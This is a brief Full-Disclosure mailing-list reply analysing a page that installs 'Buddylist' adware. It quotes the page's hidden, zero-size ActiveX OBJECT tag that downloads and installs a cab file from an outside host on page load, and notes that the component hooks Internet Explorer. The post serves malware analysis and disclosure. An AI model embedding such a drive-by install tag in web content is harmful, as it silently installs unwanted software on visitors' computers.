Hi, It�s a Buddylist Adware. The page uses codebase object to run the ActiveX component:
<OBJECT ID="ShellInstaller" WIDTH=0 HEIGHT=0 CLASSID="CLSID:FDDCE9FF-1FC6-413c-80B1-37B101FDA1D4" CODEBASE="http://download.buddylinks.net/ShellInstaller.cab#Version=1,0, 0,001"> The cab file contains the files Shellinstaller.ini (2.119 bytes) and the binary ShellInstaller.ocx (81.920 bytes). The activex component hooks itself to IE and works as a typical adware component. No virus code here. McAfee has posted a writeup at this URL: http://us.mcafee.com/virusInfo/default.asp?id=description&virus_k=101007 Regards Peter Kruse _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
